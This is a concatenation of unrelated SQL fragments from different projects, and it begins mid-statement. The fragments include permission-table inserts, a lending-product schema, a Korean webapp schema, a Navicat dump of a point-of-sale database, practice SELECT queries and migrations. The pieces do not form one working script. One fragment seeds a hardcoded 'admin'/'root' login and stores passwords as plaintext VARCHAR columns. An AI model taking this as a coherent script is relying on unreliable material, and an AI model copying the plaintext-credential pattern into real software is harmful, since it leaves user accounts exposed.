PERMISSIONDESCRIBE, CREATETIME, CREATEBY, UPDATETIME, UPDATEBY) values (17052402, 98, '导出Excel权限', '{9BD7A68A-6BD8-44E5-BA38-69EF267126F6}', '', sysdate, 0, sysdate, 0); @repeat{SELECT COUNT(*) FROM functionpermissionreg where id=17052403 } insert into functionpermissionreg (ID, FUNCTIONREGID, PERMISSIONNAME, PERMISSIONKEY, PERMISSIONDESCRIBE, CREATETIME, CREATEBY, UPDATETIME, UPDATEBY) values (17052403, 145, '打印权限', '{35C8EB7F-35CF-4695-B2CF-35E9EEF98E1A}', '', sysdate, 0, sysdate, 0); @repeat{SELECT COUNT(*) FROM functionpermissionreg where id=17052404 } insert into functionpermissionreg (ID, FUNCTIONREGID, PERMISSIONNAME, PERMISSIONKEY, PERMISSIONDESCRIBE, CREATETIME, CREATEBY, UPDATETIME, UPDATEBY) values (17052404, 145, '导出Excel权限', '{1B2D3614-6FDD-4ADF-B083-22A1A1B3FCE2}', '', sysdate, 0, sysdate, 0); --end--
ALTER TABLE t_user_card ADD is_main BOOL NOT NULL DEFAULT false COMMENT 'メインかどうか' AFTER m_card_id;
SET FOREIGN_KEY_CHECKS=0; -- ---------------------------- -- Table structure for `product` -- ---------------------------- DROP TABLE IF EXISTS `product`; CREATE TABLE `product` ( `tbid` bigint(20) NOT NULL auto_increment COMMENT '产品编号', `name` varchar(20) default NULL COMMENT '产品名称', `describe` varchar(400) default NULL COMMENT '产品描述', `maxmoney` int(11) default '0' COMMENT '金额上限', `minmoney` int(11) default NULL COMMENT '金额下限', `maxlimit` int(11) default NULL COMMENT '最大期限', `minlimit` int(11) default NULL COMMENT '最小期限', `verifytime` varchar(60) default NULL COMMENT '审核时间', `maxrate` float default NULL COMMENT '最大年利率', `minrate` float default NULL COMMENT '最小年利率', `tendertime` varchar(40) default NULL COMMENT '投标时间', `replyway` varchar(40) default NULL COMMENT '还款方式', `fee` varchar(100) default NULL COMMENT '手续费', PRIMARY KEY (`tbid`) ) ENGINE=InnoDB AUTO_INCREMENT=17 DEFAULT CHARSET=utf8;
SELECT tl.id, ev.nomeEvento, tl.antesDepois, tl.quantidade, tl.unidade, tl.acao, em.Titulo FROM ard.Timeline tl inner join eventos ev on ev.id = tl.eventoId inner join emails em on em.id = tl.emailId
CREATE DATABASE webapp; USE webapp; CREATE TABLE users( user_id VARCHAR(20) NOT NULL, user_pw VARCHAR(20) NOT NULL ); INSERT INTO users VALUES("admin", "root"); create TABLE members( name varchar(20) PRIMARY KEY, email varchar(50), web varchar(50), comment TEXT, rank varchar(20) ); INSERT INTO members VALUES("KIM JaeHyeon", "insam2802@gmail.com", "thekingod.tistory.com", "TheKinGoD", "intern"); CREATE TABLE careers( name varchar(20), career TEXT ); INSERT INTO careers VALUES("KIM JaeHyeon", "1st Careers"); INSERT INTO careers VALUES("KIM JaeHyeon", "2nd Careers"); CREATE TABLE question( id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, name VARCHAR(20), content TEXT, password VARCHAR(20) NOT NULL, lecture_id INT NOT NULL, slide INT NOT NULL, time TIMESTAMP NOT NULL ); CREATE TABLE answer( id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, q_id INT NOT NULL, name VARCHAR(20), content TEXT, password VARCHAR(20) NOT NULL, time TIMESTAMP NOT NULL ); INSERT INTO Question(name,content,password,lecture_id,slide,time) VALUES ("정희재", "어 이건 질문이야", 123123, 4, 12, NULL); INSERT INTO Question(name,content,password,lecture_id,slide,time) VALUES ("황예찬", "어 이건 질문이야!", 123123, 4, 12, NULL); INSERT INTO Question(name,content,password,lecture_id,slide,time) VALUES ("이효원", "어 이건 질문이야?", 123123, 4, 12, NULL); INSERT INTO Question(name,content,password,lecture_id,slide,time) VALUES ("모지환", "어 이건 질문이야;", 123123, 4, 12, NULL); INSERT INTO Question(name,content,password,lecture_id,slide,time) VALUES ("김재현", "어 이건 질문이야@", 123123, 4, 12, NULL); INSERT INTO Question(name,content,password,lecture_id,slide,time) VALUES ("박서연", "어 이건 질문이야#", 123123, 4, 12, NULL); INSERT INTO Answer(q_id,name,content,password, time) VALUES (1, "욱진리", "응 그럼 이건 답변이야", 123123, NULL); INSERT INTO Answer(q_id,name,content,password, time) VALUES (1, "욱진리", "응 그럼 이건 답변이야!", 123123, NULL); INSERT INTO Answer(q_id,name,content,password, time) VALUES (3, "욱진리", "응 그럼 이건 답변이야?", 123123, NULL);
/* Navicat Premium Data Transfer Source Server : LOCAL Source Server Type : MySQL Source Server Version : 80013 Source Host : localhost:3306 Source Schema : posmajoo Target Server Type : MySQL Target Server Version : 80013 File Encoding : 65001 Date: 16/09/2021 16:48:05 */ SET NAMES utf8mb4; SET FOREIGN_KEY_CHECKS = 0; -- ---------------------------- -- Table structure for admin -- ---------------------------- DROP TABLE IF EXISTS `admin`; CREATE TABLE `admin` ( `id` int(11) NOT NULL AUTO_INCREMENT, `username` varchar(30) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL, `name` varchar(50) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL, `password` varchar(256) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL, `phone` varchar(15) CHARACTER SET latin1 COLLATE latin1_swedish_ci NULL DEFAULT NULL, `email` varchar(30) CHARACTER SET latin1 COLLATE latin1_swedish_ci NULL DEFAULT NULL, `created_at` timestamp(0) NOT NULL DEFAULT CURRENT_TIMESTAMP(0), `updated_at` timestamp(0) NULL DEFAULT NULL ON UPDATE CURRENT_TIMESTAMP(0), `deleted_at` datetime(0) NULL DEFAULT NULL, PRIMARY KEY (`id`) USING BTREE, INDEX `admin_idx`(`id`, `username`, `name`) USING BTREE ) ENGINE = InnoDB CHARACTER SET = latin1 COLLATE = latin1_swedish_ci ROW_FORMAT = Dynamic; -- ---------------------------- -- Records of admin -- ---------------------------- INSERT INTO `admin` VALUES (1, 'admin', 'admin', '$2y$10$Dxn/sfyga8QqaoWEeDr1eOfMRp3FA267C944rs6L6522V22m6IHSS', NULL, NULL, '2020-12-22 11:11:13', '2021-09-15 22:47:04', NULL); -- ---------------------------- -- Table structure for category -- ---------------------------- DROP TABLE IF EXISTS `category`; CREATE TABLE `category` ( `id` smallint(6) NOT NULL AUTO_INCREMENT, `name` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_0900_ai_ci NOT NULL, `description` text CHARACTER SET utf8mb4 COLLATE utf8mb4_0900_ai_ci NULL, `image` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_0900_ai_ci NULL DEFAULT NULL, `created_at` timestamp(0) NULL DEFAULT CURRENT_TIMESTAMP(0), `updated_at` timestamp(0) NULL DEFAULT NULL ON UPDATE CURRENT_TIMESTAMP(0), `deleted_at` timestamp(0) NULL DEFAULT NULL, PRIMARY KEY (`id`) USING BTREE ) ENGINE = InnoDB AUTO_INCREMENT = 7 CHARACTER SET = utf8mb4 COLLATE = utf8mb4_0900_ai_ci ROW_FORMAT = Dynamic; -- ---------------------------- -- Records of category -- ---------------------------- INSERT INTO `category` VALUES (1, 'Printer', NULL, NULL, '2021-09-15 04:37:32', NULL, NULL); INSERT INTO `category` VALUES (2, 'Barcode Scanner', NULL, NULL, '2021-09-15 04:37:59', NULL, NULL); INSERT INTO `category` VALUES (3, 'Standee', NULL, NULL, '2021-09-15 04:38:35', NULL, NULL); INSERT INTO `category` VALUES (4, 'Cash Drawer', NULL, NULL, '2021-09-15 04:38:48', NULL, NULL); INSERT INTO `category` VALUES (5, 'Device', NULL, NULL, '2021-09-15 04:38:50', NULL, NULL); INSERT INTO `category` VALUES (6, 'Thermal Paper', NULL, NULL, '2021-09-15 04:38:59', NULL, NULL); -- ---------------------------- -- Table structure for product -- ---------------------------- DROP TABLE IF EXISTS `product`; CREATE TABLE `product` ( `id` int(11) NOT NULL AUTO_INCREMENT, `category_id` smallint(6) NOT NULL, `name` varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_0900_ai_ci NOT NULL, `description` text CHARACTER SET utf8mb4 COLLATE utf8mb4_0900_ai_ci NOT NULL, `price` bigint(10) NOT NULL, `image` text CHARACTER SET utf8mb4 COLLATE utf8mb4_0900_ai_ci NOT NULL, `created_at` timestamp(0) NULL DEFAULT CURRENT_TIMESTAMP(0), `updated_at` timestamp(0) NULL DEFAULT NULL ON UPDATE CURRENT_TIMESTAMP(0), `deleted_at` timestamp(0) NULL DEFAULT NULL, PRIMARY KEY (`id`) USING BTREE, UNIQUE INDEX `id`(`id`) USING BTREE, UNIQUE INDEX `name`(`name`) USING BTREE, INDEX `category_id`(`category_id`) USING BTREE, CONSTRAINT `product_ibfk_1` FOREIGN KEY (`category_id`) REFERENCES `category` (`id`) ON DELETE RESTRICT ON UPDATE RESTRICT ) ENGINE = InnoDB CHARACTER SET = utf8mb4 COLLATE = utf8mb4_0900_ai_ci ROW_FORMAT = Dynamic; -- ---------------------------- -- Records of product -- ---------------------------- INSERT INTO `product` VALUES (1, 1, 'Printer Kasir Bluetooth Mobile 58mm\r\n', '<ul>\r\n <li>Cetak struk kasir bergerak</li>\r\n <li>Printer mobile ekonomis</li>\r\n </ul>', 475000, 'mobile-printer.png', '2021-09-16 12:17:14', '2021-09-16 12:17:52', NULL); SET FOREIGN_KEY_CHECKS = 1;
USE computer_firm; #1 SELECT maker, `type` FROM product WHERE `type`='PC'; #2 SELECT model, ram, screen, price FROM laptop WHERE price>1000 ORDER BY ram, price DESC; #3 SELECT * FROM printer WHERE color='y' ORDER BY price DESC; #4 SELECT model, speed, hd, cd, price FROM pc WHERE (cd='12x' OR cd ='24x') AND price<600 ORDER BY speed DESC; USE ships; #5 SELECT `name`, class FROM ships ORDER BY `name`; USE computer_firm; #6 SELECT * FROM pc WHERE speed>=500 AND price<800 ORDER BY price DESC; #7 SELECT * FROM printer WHERE `type`!='matrix' AND price<300 ORDER BY `type` DESC; #8 SELECT model, speed FROM pc WHERE price BETWEEN 400 AND 600 ORDER BY hd; #9 SELECT pc.model, pc.speed, pc.hd FROM pc, product WHERE (pc.hd=10 OR pc.hd=20) AND pc.model=product.model AND product.maker='A' ORDER BY pc.speed; #10 SELECT model, speed, hd, price FROM laptop WHERE screen>=12 ORDER BY price DESC; #11 SELECT model, `type`, price FROM printer WHERE price<300 ORDER BY type DESC; #12 SELECT model, ram, price FROM laptop WHERE ram=64 ORDER BY screen; #13 SELECT model, ram, price FROM pc WHERE ram>64 ORDER BY hd; #14 SELECT model, speed, price FROM pc WHERE speed BETWEEN 500 AND 750 ORDER BY hd DESC; USE secondary_raw_materials_company; #15 SELECT * FROM outcome_o WHERE `out`>2000 ORDER BY `date` DESC; #16 SELECT * FROM income_o WHERE inc BETWEEN 5000 AND 10000 ORDER BY inc; #17 SELECT * FROM income WHERE `point`=1 ORDER BY inc; #18 SELECT * FROM outcome WHERE `point`=2 ORDER BY `out`; use ships; #19 SELECT * FROM classes WHERE country='Japan' ORDER BY `type`; #20 SELECT `name`, launched FROM ships WHERE launched BETWEEN 1940 AND 1942 ORDER BY launched DESC; #21 SELECT ship, battle, result FROM outcomes WHERE battle='Guadalcanal' ORDER BY ship DESC; #22 SELECT ship, battle, result FROM outcomes WHERE result='sunk' ORDER BY ship DESC; #23 SELECT class, displacement FROM classes WHERE displacement>=40000 ORDER BY `type`; use airport; #24 SELECT trip_no, town_from, town_to FROM trip WHERE town_from='London' OR town_to='London' ORDER BY time_out; #25 SELECT trip_no, plane, town_from, town_to FROM trip WHERE plane='TU-134' ORDER BY time_out DESC; #26 SELECT trip_no, plane, town_from, town_to FROM trip WHERE plane!='IL-86' ORDER BY plane; #27 SELECT trip_no, town_from, town_to FROM trip WHERE town_from!='Rostov' AND town_to!='Rostov' ORDER BY plane;
-- Dec 17, 2010 2:44:56 PM COT -- BF3139066-False Mandary Logic for C_BPartner_Product/IsManufacturer UPDATE AD_Column SET MandatoryLogic=NULL, DefaultValue='N',Updated=TO_DATE('2010-12-17 14:44:56','YYYY-MM-DD HH24:MI:SS'),UpdatedBy=100 WHERE AD_Column_ID=58799 ; -- Dec 17, 2010 2:44:59 PM COT ALTER TABLE C_BPartner_Product MODIFY IsManufacturer CHAR(1) DEFAULT 'N' ; -- Dec 17, 2010 2:44:59 PM COT UPDATE C_BPartner_Product SET IsManufacturer='N' WHERE IsManufacturer IS NULL ;
alter table "public"."SkillTag" alter column "id" set default nextval('"SkillTag_id_seq"'::regclass); alter table "public"."SkillTag" alter column "id" drop not null; alter table "public"."SkillTag" add column "id" int4; alter table "public"."SkillTag" add constraint "SkillTag_pkey" primary key ("id"); DROP TABLE "public"."SkillTag"; alter table "public"."Tag" drop constraint "Tag_pkey"; alter table "public"."Tag" add constraint "Tag_pkey" primary key ("name"); -- Could not auto-generate a down migration. -- Please write an appropriate down migration for the SQL below: -- alter table "public"."Tag" add column "id" serial -- not null unique; DROP TABLE "public"."Tag";